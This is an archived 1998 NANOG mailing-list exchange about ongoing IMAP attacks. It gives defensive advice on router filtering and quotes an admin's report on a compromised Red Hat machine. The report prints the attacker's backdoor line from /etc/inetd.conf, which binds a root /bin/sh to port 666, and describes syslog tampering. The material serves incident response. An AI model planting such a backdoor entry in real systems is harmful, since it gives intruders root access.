|
North American Network Operators Group Date Prev | Date Next | Date Index | Thread Index | Author Index | Historical Re: IMAP attacks continue
Btw. The best you can do is to install access-filter on the router and log any attempts to connect into this port in your network; and if you see such attempt you should write 'Hacker in your system (suspection)' warning to the network admin where this connect was originated from. 70% of this cases should be 'broken systems'. On Mon, 23 Nov 1998, Phil Howard wrote: > Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST) > From: Phil Howard <[email protected]> > To: [email protected] > Subject: Re: IMAP attacks continue > > An addendum to: > > > I found a machine that had Red Hat 5.1 unmodified running on it, and it > > got hit. So I closed things off and looked around for damage and found > > the following: > > > > 1. Syslogd had been killed off and the syslog file deleted. > > > > 2. A backdoor was installed in /etc/inetd.conf as follows: > > > > ttalk stream tcp nowait root /bin/sh sh -i > > I checked the ports assignments from IANA and there is no such thing as > "ttalk". I found this line in /etc/services: > > ttalk 666/tcp > > so it appears to be hijacking the port used by (as seen in the file > ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers): > > mdqs 666/tcp > mdqs 666/udp > doom 666/tcp doom Id Software > doom 666/udp doom Id Software > > So also check /etc/services on any potentially compromised machines. > > -- > -- *-----------------------------* Phil Howard KA9WGN * -- > -- | Inturnet, Inc. | Director of Internet Services | -- > -- | Business Internet Solutions | eng at intur.net | -- > -- *-----------------------------* philh at intur.net * -- > Aleksei Roudnev, Network Operations Center, Relcom, Moscow (+7 095) 194-19-95 (Network Operations Center Hot Line),(+7 095) 239-10-10, N 13729 (pager) (+7 095) 196-72-12 (Support), (+7 095) 194-33-28 (Fax)
|